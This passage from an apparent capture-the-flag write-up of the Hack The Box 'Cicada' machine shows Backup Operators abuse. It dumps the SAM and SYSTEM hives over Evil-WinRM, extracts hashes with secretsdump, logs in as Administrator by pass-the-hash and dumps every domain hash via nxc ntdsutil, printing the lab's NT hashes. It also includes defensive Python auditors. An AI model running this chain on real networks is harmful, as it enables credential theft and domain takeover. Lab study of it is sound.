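BUILTIN\Backup Operators        Alias            S-1-5-32-551 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias            S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                   Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== ========
SeBackupPrivilege             Back up files and directories  Enabled
SeRestorePrivilege            Restore files and directories  Enabled
SeShutdownPrivilege           Shut down the system           Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
"""


def column_spans(underline):
    """Return (start, end) offsets of each '====' run in a header underline."""
    return [(m.start(), m.end()) for m in re.finditer(r"=+", underline)]


def split_row(line, spans):
    """Slice one fixed-width row into a stripped field per column."""
    fields = []
    for i, (start, end) in enumerate(spans):
        # The last column may overflow its underline; take the rest of the line.
        chunk = line[start:] if i == len(spans) - 1 else line[start:end]
        fields.append(chunk.strip())
    return fields


def parse_whoami(text):
    """Return {"groups": [[name, type, sid, attrs], ...], "privileges": [[name, desc, state], ...]}."""
    result = {"groups": [], "privileges": []}
    section, spans = None, None
    for line in text.splitlines():
        line = line.rstrip()
        if line in SECTIONS:
            section, spans = SECTIONS[line], None
        elif section is None:
            continue  # USER INFORMATION and USER CLAIMS are not audited here
        elif spans is None:
            # Skip the dashed title and column headers until the '=' underline,
            # which fixes the column boundaries for this table.
            if line.startswith("="):
                spans = column_spans(line)
        elif not line:
            section = None  # a blank line closes the table
        else:
            result[section].append(split_row(line, spans))
    return result


def audit(parsed):
    """Return (kind, name, reason) tuples for risky groups and privileges."""
    findings = []
    for name, _type, sid, _attrs in parsed["groups"]:
        if sid in RISKY_GROUP_SIDS:
            findings.append(("group", name, RISKY_GROUP_SIDS[sid]))
    for name, _desc, state in parsed["privileges"]:
        # Disabled risky privileges are reported too: a process can enable any
        # privilege present in its token with AdjustTokenPrivileges.
        if name in RISKY_PRIVILEGES:
            findings.append(("privilege", f"{name} ({state})", RISKY_PRIVILEGES[name]))
    return findings


if __name__ == "__main__":
    for kind, name, reason in audit(parse_whoami(SAMPLE_WHOAMI)):
        print(f"[{kind}] {name}: {reason}")
```

Run against the sample it reports the Backup Operators membership and the two backup-related privileges, which is the whole escalation path used below; the same parser works on the output of any account one wants to review, and the mitigation is the usual one: keep interactive and service accounts out of Backup Operators and give backup software a dedicated account that cannot log on remotely.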

```
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> reg save hklm\sam sam
The operation completed successfully.

*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> reg save hklm\system system
The operation completed successfully.

*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> download sam

Info: Downloading C:\Users\emily.oscars.CICADA\Documents\sam to sam

Info: Download successful!
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> download system

Info: Downloading C:\Users\emily.oscars.CICADA\Documents\system to system

Info: Download successful!
```

Extract the hashes with impacket's secretsdump

```
┌──(root㉿kaada)-[/home/kali/Desktop]
└─# impacket-secretsdump -sam sam -system system local
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies

[*] Target system bootKey: 0x3c2b033757a49110a9ee680b46e8d620
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:2b87e7c93a3e8a0ea4a581937016f341:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*] Cleaning up...
```

Verify that the hash works

```
┌──(root㉿kaada)-[/home/kali/Desktop]
└─# nxc winrm cicada.htb -u 'Administrator' -H '2b87e7c93a3e8a0ea4a581937016f341'
WINRM 10.129.254.81 5985 CICADA-DC [*] Windows Server 2022 Build 20348 (name:CICADA-DC) (domain:cicada.htb)
WINRM 10.129.254.81 5985 CICADA-DC [+] cicada.htb\Administrator:2b87e7c93a3e8a0ea4a581937016f341 (Pwn3d!)
```

Now we can log in to the Administrator account with evil-winrm.

Administrator


```
┌──(root㉿kaada)-[/home/kali/Desktop]
└─# evil-winrm -u 'Administrator' -H '2b87e7c93a3e8a0ea4a581937016f341' -i cicada.htb

Evil-WinRM shell v3.7

Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
cicada\administrator
```

With the Administrator hash in hand, the ntdsutil module can dump the hashes of every account in the domain.

```
┌──(root㉿kaada)-[/home/kali/Desktop]
└─# nxc smb cicada.htb -u 'Administrator' -H '2b87e7c93a3e8a0ea4a581937016f341' -M ntdsutil
/root/.local/share/pipx/venvs/netexec/lib/python3.13/site-packages/masky/lib/smb.py:6: UserWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html. The pkg_resources package is slated for removal as early as 2025-11-30. Refrain from using this package or pin to Setuptools<81.
from pkg_resources import resource_filename
SMB 10.129.254.81 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB 10.129.254.81 445 CICADA-DC [+] cicada.htb\Administrator:2b87e7c93a3e8a0ea4a581937016f341 (Pwn3d!)
NTDSUTIL 10.129.254.81 445 CICADA-DC [*] Dumping ntds with ntdsutil.exe to C:\Windows\Temp\176821327
NTDSUTIL 10.129.254.81 445 CICADA-DC Dumping the NTDS, this could take a while so go grab a redbull...
NTDSUTIL 10.129.254.81 445 CICADA-DC [+] NTDS.dit dumped to C:\Windows\Temp\176821327
NTDSUTIL 10.129.254.81 445 CICADA-DC [*] Copying NTDS dump to /tmp/tmpryqav_rz
NTDSUTIL 10.129.254.81 445 CICADA-DC [*] NTDS dump copied to /tmp/tmpryqav_rz
NTDSUTIL 10.129.254.81 445 CICADA-DC [+] Deleted C:\Windows\Temp\176821327 remote dump directory
NTDSUTIL 10.129.254.81 445 CICADA-DC [+] Dumping the NTDS, this could take a while so go grab a redbull...
NTDSUTIL 10.129.254.81 445 CICADA-DC Administrator:500:aad3b435b51404eeaad3b435b51404ee:2b87e7c93a3e8a0ea4a581937016f341:::
NTDSUTIL 10.129.254.81 445 CICADA-DC Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
NTDSUTIL 10.129.254.81 445 CICADA-DC CICADA-DC$:1000:aad3b435b51404eeaad3b435b51404ee:188c2f3cb7592e18d1eae37991dee696:::
NTDSUTIL 10.129.254.81 445 CICADA-DC krbtgt:502:aad3b435b51404eeaad3b435b51404ee:3779000802a4bb402736bee52963f8ef:::
NTDSUTIL 10.129.254.81 445 CICADA-DC cicada.htb\john.smoulder:1104:aad3b435b51404eeaad3b435b51404ee:0d33a055d07e231ce088a91975f28dc4:::
NTDSUTIL 10.129.254.81 445 CICADA-DC cicada.htb\sarah.dantelia:1105:aad3b435b51404eeaad3b435b51404ee:d1c88b5c2ecc0e2679000c5c73baea20:::
NTDSUTIL 10.129.254.81 445 CICADA-DC cicada.htb\michael.wrightson:1106:aad3b435b51404eeaad3b435b51404ee:b222964c9f247e6b225ce9e7c4276776:::
NTDSUTIL 10.129.254.81 445 CICADA-DC cicada.htb\david.orelious:1108:aad3b435b51404eeaad3b435b51404ee:ef0bcbf3577b729dcfa6fbe1731d5a43:::
NTDSUTIL 10.129.254.81 445 CICADA-DC cicada.htb\emily.oscars:1601:aad3b435b51404eeaad3b435b51404ee:559048ab2d168a4edf8e033d43165ee5:::
NTDSUTIL 10.129.254.81 445 CICADA-DC [+] Dumped 9 NTDS hashes to /root/.nxc/logs/ntds/CICADA-DC_10.129.254.81_2026-01-12_052110.ntds of which 8 were added to the database
NTDSUTIL 10.129.254.81 445 CICADA-DC [*] To extract only enabled accounts from the output file, run the following command:
NTDSUTIL 10.129.254.81 445 CICADA-DC [*] grep -iv disabled /root/.nxc/logs/ntds/CICADA-DC_10.129.254.81_2026-01-12_052110.ntds | cut -d ':' -f1
```

At this point we hold every hash from the domain controller, which amounts to full control of the whole domain.
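Both hash exports above, secretsdump's SAM dump and the nxc ntdsutil dump, use the pwdump line format `user:rid:lmhash:nthash:::`, the second behind an `NTDSUTIL <ip> <port> <host>` prefix. The same output is what an authorised credential audit reviews after a sanctioned extraction, and the questions it asks are mechanical: which accounts have the empty-password hash, which still store an LM hash, and which accounts share a password (NT hashes are unsalted, so identical hashes mean identical passwords). The following Python is an added example written for this page, not code from the original writeup, impacket or nxc; it parses both line formats and produces those three findings. The sample lines are constructed: apart from the two public empty-string hash constants, the hashes and the three extra account names are made up.

```python
"""Credential-hygiene audit over SAM/NTDS hash exports.

Added example, not part of the original writeup and not impacket or nxc
code. Parses pwdump-style records as printed by impacket-secretsdump and
as echoed by nxc's ntdsutil module, then reports empty passwords, stored
LM hashes and password reuse. SAMPLE_EXPORT is constructed.
"""
import re
from collections import defaultdict

# Hashes of the empty string; public constants, not secrets.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

# <account>:<rid>:<lm>:<nt>::: at the end of a line. The account may carry a
# DOMAIN\ prefix and cannot contain ':' (not legal in sAMAccountName), so the
# nxc prefix in front of the record is skipped by the search.
PWDUMP_RE = re.compile(
    r"(?P<acct>[^\s:]+):(?P<rid>\d+):(?P<lm>[0-9a-fA-F]{32}):(?P<nt>[0-9a-fA-F]{32}):::\s*$"
)

# Constructed sample mixing both formats; hashes other than the two empty-string
# constants are made up, as are svc_backup, legacy.app and jane.doe.
SAMPLE_EXPORT = r"""
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies

[*] Target system bootKey: 0x00000000000000000000000000c0ffee
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*] Cleaning up...
NTDSUTIL 10.129.254.81 445 CICADA-DC [+] Dumping the NTDS, this could take a while so go grab a redbull...
NTDSUTIL 10.129.254.81 445 CICADA-DC krbtgt:502:aad3b435b51404eeaad3b435b51404ee:fedcba9876543210fedcba9876543210:::
NTDSUTIL 10.129.254.81 445 CICADA-DC cicada.htb\svc_backup:1700:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
NTDSUTIL 10.129.254.81 445 CICADA-DC cicada.htb\legacy.app:1701:0f0f0f0f0f0f0f0f0f0f0f0f0f0f0f0f:11111111111111111111111111111111:::
NTDSUTIL 10.129.254.81 445 CICADA-DC cicada.htb\jane.doe:1702:aad3b435b51404eeaad3b435b51404ee:22222222222222222222222222222222:::
"""


def parse_hash_lines(text):
    """Return one record per pwdump line, ignoring banners and status lines."""
    records = []
    for line in text.splitlines():
        m = PWDUMP_RE.search(line)
        if not m:
            continue
        _, _, user = m.group("acct").rpartition("\\")  # drop any DOMAIN\ prefix
        records.append({"user": user, "rid": int(m.group("rid")),
                        "lm": m.group("lm").lower(), "nt": m.group("nt").lower()})
    return records


def audit_hashes(records):
    """Group the records into the three findings a credential audit reports."""
    by_nt = defaultdict(list)
    for r in records:
        by_nt[r["nt"]].append(r["user"])
    return {
        # Built-ins such as Guest and DefaultAccount are normally disabled and
        # expected here; any enabled account in this list is critical.
        "empty_password": sorted(by_nt.get(EMPTY_NT, [])),
        # A stored LM hash means LM storage was still allowed when this
        # password was set (NoLMHash not enforced or password older than it).
        "lm_hash_stored": sorted(r["user"] for r in records if r["lm"] != EMPTY_LM),
        # Same NT hash on different accounts: one password reused across them.
        "shared_password": sorted(sorted(users) for nt, users in by_nt.items()
                                  if nt != EMPTY_NT and len(users) > 1),
    }


if __name__ == "__main__":
    for finding, accounts in audit_hashes(parse_hash_lines(SAMPLE_EXPORT)).items():
        print(f"{finding}: {accounts}")
```

On the sample this flags Guest and DefaultAccount for the empty hash, legacy.app for a stored LM hash, and Administrator together with svc_backup for sharing a password; that last finding is the one that turns a single compromised account into several, and it is invisible without comparing the hashes across the whole export.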


Author: Skyarrow. Posted on January 12, 2026. Original URL: http://example.com/2026/01/12/从零开始的windows生活-Cicada/